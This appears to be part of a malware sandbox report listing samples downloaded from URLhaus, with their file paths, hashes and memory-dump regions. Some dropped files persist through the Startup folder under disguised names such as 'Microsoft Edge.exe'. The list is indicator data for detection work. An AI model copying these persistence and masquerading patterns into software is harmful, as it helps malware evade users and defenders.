SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\Downloads\UrlHausFiles\DK.exe

MD5 14988e9d35a0c92435297f7b2821dc60
SHA1 8c00da2ab4cf6da0c179f283eac0053231859f8c
SHA256 677b8ff45ebb9486a99aecf8dd2b4b362010573ecc4d0d082eda6a36a7cab671
SHA512 808401d94154a10a5e531b51af6f0a4876b9bbc0c288c33eb964101b30780766a4d7539cb146285d0bceddca4fbc77e072aab91224ab66c29c3feb04a13c2221

memory/6232-5898-0x0000000000820000-0x000000000089E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

MD5 76a0b06f3cc4a124682d24e129f5029b
SHA1 404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0
SHA256 3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6
SHA512 536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

C:\Users\Admin\Downloads\UrlHausFiles\wow.exe

MD5 a09ccb37bd0798093033ba9a132f640f
SHA1 eac5450bac4b3693f08883e93e9e219cd4f5a418
SHA256 ff9b527546f548e0dd9ce48a6afacaba67db2add13acd6d2d70c23a8a83d2208
SHA512 aab749fedf63213be8ceef44024618017a9da5bb7d2ba14f7f8d211901bbb87336bd32a28060022f2376fb6028ac4ceb6732324c499459a2663ee644e15fde06

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

MD5 66b03d1aff27d81e62b53fc108806211
SHA1 2557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA256 59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA512 9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

memory/6352-5938-0x00000000006B0000-0x0000000000748000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

MD5 7b1d21282a65bac0410541f7466c7038
SHA1 9a1010aba1b23ba1e118c8cd29fff8ecd39431d9
SHA256 e465f41c82dcc8e91aa580b348064196c696a6b76b28ee82d5e194ca2261e49e
SHA512 5a5c4896af0095067e88e0b0d844115df59cc9b25d01d8ee541e88666c15448d1d3dd2dd7796a438616db10016e84450ebd1fd2441b47277f74a3098ed2629c3

memory/5128-5948-0x0000000000400000-0x000000000064F000-memory.dmp

memory/5192-5949-0x0000000000010000-0x00000000000E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E6E.tmp.exe

MD5 e0a745edcc32cc7b0fe58794b0722fac
SHA1 fa87bf5087a2a013fda69721aa653d41bd57657e
SHA256 c9c8e138a0b3f6fde60740a7fba42e107daac399e5c99ec710309f88553efbb4
SHA512 9b8367d852915003f769698b34df0fd3ba900fb7385fefb0960088ff9f10b00ea101bb2c112cde9929e2ffb176fe2f99773876748fa35cc66b5fd3149ef2b2ef

C:\Users\Admin\Downloads\UrlHausFiles\Yellow%20Pages%20Scraper.exe

MD5 60ee968291e60900894fc9d914a48a80
SHA1 2c26edf35ac813a2f83148f62676e30b45f171a9
SHA256 52d5d347126a7a686f2da37c2e8868f4bcec2e5affabd850ad45f2b81b21b664
SHA512 9ea212bb0eb25f5309a8717218693306b18fb092d0910015fe4ef569f35377a73647507cb5629266f55550cc2fcc8d73a30d4f4e3c2d2ddd7ba22b575106cfd0

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

MD5 9f3e5e1f0b945ae0abd47bbfe9e786c0
SHA1 41d728d13a852f04b1ebe22f3259f0c762dc8eed
SHA256 269c4228bd5c9ecf58e59ad19cb65f1cb3edd1c52c01ccc10a2f240d4cc4e4e1
SHA512 f7017b3361628cbd25aac02099e75e328eeaa4793d6d4682220c8123bd66e8a58bb02e4cdf105035b8e7a06e6f50bf77c80c3ad10e021433dac7280bff8922bd

memory/7084-5988-0x0000000000520000-0x00000000005D0000-memory.dmp

memory/6232-5990-0x0000000000820000-0x000000000089E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 bd6d6662b11f947d8480c6e9815c3ef3
SHA1 b5ecc2be2f54b7849b8c948bbd91cef25028ce41
SHA256 7191093754402a6cc5ee460bafef859de07ac2bbf91ce56c6b56a91d3020c2e2
SHA512 242a995d3c3a123401d7776b1b5b373d7d117566a897e3e8ed2fe07faaff3dfda01daca76cc60012a6480412f6118b5185926677bb61678bdb3cca336a36e8fa

memory/5568-6011-0x0000000000DB0000-0x0000000001A21000-memory.dmp

memory/2304-6016-0x0000000000740000-0x0000000000988000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

MD5 031377e4e34dcd19917fac02ff6da79f
SHA1 0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256 d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
SHA512 f682a314a74dad1269dc1d948dc0c4773eb08e76ab364c3d5a9893577395126e5a409fca18cab24378e95fa71b8d96e20ad22e644275daf3f997edf8592da5c4

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

MD5 99b098b23ced1a199145fe5577c9de91
SHA1 84031f7b3c97759d56b14591e1cf0ba1f552f201
SHA256 8979e74303550e257eb92225507bf2fb128cebde5f3f6e36b4236e822e194f64
SHA512 05cf74845b264ef2bf6faf8e8900e0f41baa04d43f989a33abbbb1cae9311789d50388510c836cf6dc5f314000572884a9823973a2c4950bfe0ba4699288fbfb

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

MD5 aaf1146ec9c633c4c3fbe8091f1596d8
SHA1 a5059f5a353d7fa5014c0584c7ec18b808c2a02c
SHA256 cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272
SHA512 164261748e32598a387da62b5966e9fa4463e8e6073226e0d57dd9026501cd821e62649062253d8d29e4b9195c495ecaeab4b9f88bd3f34d3c79ed9623658b7c

memory/7684-6093-0x0000021CC9C80000-0x0000021CC9CBC000-memory.dmp

memory/7684-6094-0x0000021CE2530000-0x0000021CE2540000-memory.dmp

memory/7684-6092-0x0000021CC8020000-0x0000021CC8124000-memory.dmp

memory/7892-6098-0x0000000000400000-0x000000000041F000-memory.dmp

memory/7684-6106-0x0000021CE26E0000-0x0000021CE2792000-memory.dmp

memory/7684-6105-0x0000021CE25E0000-0x0000021CE2612000-memory.dmp

memory/7684-6104-0x0000021CE2570000-0x0000021CE25A0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi

MD5 5144f4f71644edb5f191e12264318c87
SHA1 09a72b5870726be33efb1bcf6018e3d68872cc6d
SHA256 403f98abad4a3d681466b21dc3e31eb1b37ef8ca34d6f15db675b9260efe0993
SHA512 977f10a82de75fc841040d96e3e343f7607427470aa69d6d5c365d97e34d8595120932eb52a65d48199816c1a16054c0bca2f18e13da8acfe8679d9da4a87e9a

memory/2304-6117-0x0000000000740000-0x0000000000988000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\06D4148FB55A65DDC0B3617260FF0892

MD5 5bfa51f3a417b98e7443eca90fc94703
SHA1 8c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256 bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA512 4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\06D4148FB55A65DDC0B3617260FF0892

MD5 4aad3167e829ca6045831cd16d9c763d
SHA1 791aa293ed812e94ce123e8d849af59e359b4fd0
SHA256 6409c40f7a27f00a1afb1a1235172f8b69193774cb2a1e1ad8f7bfe1abc9f482
SHA512 88adda78255352f7bc50b28d5c401414d982666f9e5c724633e267902647e13fcdbb2c545ec4fa7b667da3861daa2c7e62b8fbeeb1e1817ee8f3f942b3e736b1

memory/7456-6144-0x0000000000400000-0x000000000042E000-memory.dmp

memory/5580-6148-0x0000000000400000-0x000000000042E000-memory.dmp

memory/5580-6150-0x0000000000400000-0x000000000042E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bypass.exe

MD5 1efcfd4df313db8498547e0580b1a4a5
SHA1 bb5f6446bf7db6ba3fbd96851501f54450d638f5
SHA256 aba421350c6790a4ec7ef298082c6b7e148fd61f721ea2c2ee8e4bf0504202a6
SHA512 ce6c8edaf6635b8043d3a55c7e101e7ed0c923a1000b2525303d0be1961d80e7364e6b8898330094b9037afc4d21ccd972f994296fad38e58a73b9cc10c5617f

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

MD5 5c71794e0bfd811534ff4117687d26e2
SHA1 f4e616edbd08c817af5f7db69e376b4788f835a5
SHA256 f5740aded1f401665ab8bde43afee5dc0b01aa8aacabe9b8bb61b1ef52134a39
SHA512 a7a489d39d2cabdd15fd23354140c559a93969a7474c57553c78dbb9ebbf045541f42c600d7d4bea54a2a1f1c6537b8027a1f385fde6040f339959862ac2ea54

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

MD5 fc3ec670ed332cdde2e7c3e2bc12d4e7
SHA1 ae7bc2e54d607f71d8dc96bfa5a9d95705fee85e
SHA256 565d8418a61394823d0b15ca93db41c44cc12928f1e6a7b153d945f5f13db476
SHA512 375a9d85ec284e471e2aa2dab4d9b25df7fe4619552d9218c9aeddbbef0ee649591554844c550ea2705e82e2f5f0de03ca4369a9544261ddef216ae14854bf4e

C:\Users\Admin\AppData\Local\Temp\nsn57A2.tmp\ioSpecial.ini

MD5 a553cbdf4b96a1576d52aacd30cc4201
SHA1 726cddb2d71bd12acaf7617d01eb653447b051a5
SHA256 0c42e82c27a6a9930161a06417406fad292a6eadc8bbe809834c945154b06ae4
SHA512 8a9746a22690d554762d51915174ec1cd932ed591b2702296aa794ae9312b1edfc7aeea5fdacdb502d541d165589b82eb312269d00f92be9780b04d9ea929bd1

memory/7864-6273-0x0000000000450000-0x00000000009BB000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe

MD5 38dbe26818d84ca04295d639f179029c
SHA1 f24e9c792c35eb8d0c1c9f3896de5d86d2fd95ff
SHA256 9f94daaec163d60c74fff0f0294942525be7b5beaf26199da91e7be86224ceeb
SHA512 85c2261fdc84aee4e0bab9ebe72f8e7f0a53c22a1f2676de0c09628a3dbe6ebc9e206effd7a113a8e0e3fdb351656d0ebb87b799184591655778db0754e11163

memory/5356-6284-0x0000000000400000-0x000000000051A000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

MD5 45fe36d03ea2a066f6dd061c0f11f829
SHA1 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88
SHA256 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6
SHA512 c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f

C:\Users\Admin\AppData\Local\Temp\5BD7.tmp.x.exe

MD5 97eb7baa28471ec31e5373fcd7b8c880
SHA1 397efcd2fae0589e9e29fc2153ffb18a86a9b709
SHA256 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb
SHA512 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced

memory/8124-6311-0x00007FF7E1CA0000-0x00007FF7E28F0000-memory.dmp

memory/5568-6310-0x0000000000DB0000-0x0000000001A21000-memory.dmp

memory/8132-6309-0x0000000000FC0000-0x0000000001012000-memory.dmp

memory/6352-6313-0x0000000005390000-0x00000000053A2000-memory.dmp

memory/8132-6317-0x0000000006A10000-0x0000000007028000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\N67fLgN.exe

MD5 974049047492d0a73f8c23e25de924ef
SHA1 97a726b88efaf70855af7cebb15c7564c45bc43c
SHA256 5ca90e9115be40ba7fd2d93b848fd2b0be7eb37115ed96f23d3b8051854981d8
SHA512 bf7350536c404b84a25abf91c00f7fa6a78f3e857fe6a0915fff124f121cfa6138001d075858c077d36ef0698b92c040942e4eb539531d7c890be77fdc0b8ec2

memory/8132-6321-0x0000000005BD0000-0x0000000005C0C000-memory.dmp

memory/8132-6319-0x0000000005B70000-0x0000000005B82000-memory.dmp

memory/8132-6318-0x0000000005C80000-0x0000000005D8A000-memory.dmp

memory/8132-6331-0x0000000005C20000-0x0000000005C6C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

MD5 e468cade55308ee32359e2d1a88506ef
SHA1 278eb15a04c93a90f3f5ef7f88641f0f41fac5bc
SHA256 f618e9fa05c392501fb76415d64007225fe20baddc9f1a2dcc9ff3599473a8eb
SHA512 82fef308bc65616efb77b3f97ff7fcd14623a3955d18a9afff5c086d85d0f2e6856468ad992da2fb01aae6488afb0c0cdb80744cc20d74d3af851f35d30947d6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.exe

MD5 864fea4541f9e82764ad948599abd683
SHA1 42e5bd6a8b21cba48054d4fba17e01eda5073aac
SHA256 30de73b749f800363ac43060af1cde149ce927883246c40fad5541df8cc462cf
SHA512 ae7ea7c1ea2ec445366461cbad0b46ffe7ede86c1aa7334f8ab6e5cf3ab68c9615a8bfbd94cf491779a38a660e6de8fd17bfeca8c95f4a7d0288b9d9bf6ca8a7

C:\Users\Admin\AppData\Local\Temp\7645.tmp.zx.exe

MD5 d9ae4ab7e356e38950359025308c78f9
SHA1 4b3ddd44f69c2aa575a1f0ecb96e0050002f16d3
SHA256 c1b55b6f15c2ae193752a3ea651033224962002e8e67020e4d71229af64126ab
SHA512 a5816eb10f4894b5989b4eace3d9dbd6d08897ffb22225bd1aef9f5415b0c5c3d4ac1c44885369e7539368c4f879d80082fdccd394d94161cebf38effe884340

C:\Users\Admin\Downloads\UrlHausFiles\4.exe

MD5 4cf7ec59209b42a0bc261c8cc4e70a48
SHA1 415ec9061883da4cadb5251519079dfe59e0924a
SHA256 2e5e8a0087e49de9ba8df196bc71e3ac0d6c2ca6095ac3ff91205bd9d8eaf678
SHA512 de28c9871740577f89902b6e65c3dd00889dfcfcb3ce83fad05070761d1dc9ce4fe85f92e8443f80cf4869956a4f558b60b509302d38b1bc53b5b3536936e7d8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Process.exe

MD5 bc12151fecfb5bbedbae3d62586d4109
SHA1 88101de1ea5e5743c2dd72666a0d68dcf75c1cd6
SHA256 70d7a24104cb60b76aac7e9e0740b66d0f2279750bd2ddd6b5d984226def424d
SHA512 b7334a44c4b22b3fcf4a4e5f759101cf648266c2ef1eafd949e897d3ac569960557a8395a7dd68633fe4fc68430056031e1cab6c32f62a5692f04ca563d8ebdb

memory/7864-6481-0x0000000000450000-0x00000000009BB000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

MD5 8dc615a726d1e47c1bbda80d36de8eb4
SHA1 c37198624c15c5a541fce60a164ee0f957b9c269
SHA256 e00aa3c4c4c619fc05fc7deec32ca06959076b3df1063fd2da4205cca4882a94
SHA512 ab52c58de0e7242f78165450498b64e610c36bfc63cb302b33d0400100ae3cd12b444a7b6ed708e0f11bb8b46b5c4d4147ab0ba1ccc5b3633549b65a12146031

memory/5356-6510-0x0000000000400000-0x000000000051A000-memory.dmp

memory/6308-6513-0x0000000000500000-0x0000000000660000-memory.dmp

memory/8124-6515-0x00007FF7E1CA0000-0x00007FF7E28F0000-memory.dmp

memory/6308-6520-0x0000000025A80000-0x0000000025AC2000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

MD5 59a9510540fec35043b990deb270b139
SHA1 54d66862a4c08ebcba8029ec99d558725603f486
SHA256 9c113da0d913a9fd2a84c5c9a71da4338e3f16a62b8215ecb7a58d10ccab524f
SHA512 011ea8ffe125a6f68f149a0a5b7bcd95197ac8b7d3d7d362807ef984e971411f2b125921fbcbc183e95633555ac58c4e287b6a858f19e077dd9a8eb0975e3e06

memory/6352-6534-0x0000000006500000-0x0000000006564000-memory.dmp

memory/6740-6535-0x00000000007F0000-0x0000000000802000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

MD5 64f01094081e5214edde9d6d75fca1b5
SHA1 d7364c6fb350843c004e18fc0bce468eaa64718f
SHA256 5861fcac5dcd75e856fb96a2f0563df56e321a4be2c420618763d0bf495700a0
SHA512 a7679967d985d006a3c6b000d32b5a258b3c489bddb303c98d9cc54fa597d8a410fa66980767fcf1defe682f7952f744fd3bace26e66244a2529dbddd7a35db0

memory/7744-6569-0x0000000002D60000-0x0000000002D96000-memory.dmp

memory/7744-6574-0x0000000005810000-0x0000000005E38000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

memory/5568-6568-0x0000000000DB0000-0x0000000001A21000-memory.dmp

memory/7744-6621-0x00000000061A0000-0x0000000006206000-memory.dmp

memory/3756-6642-0x0000000000400000-0x000000000066D000-memory.dmp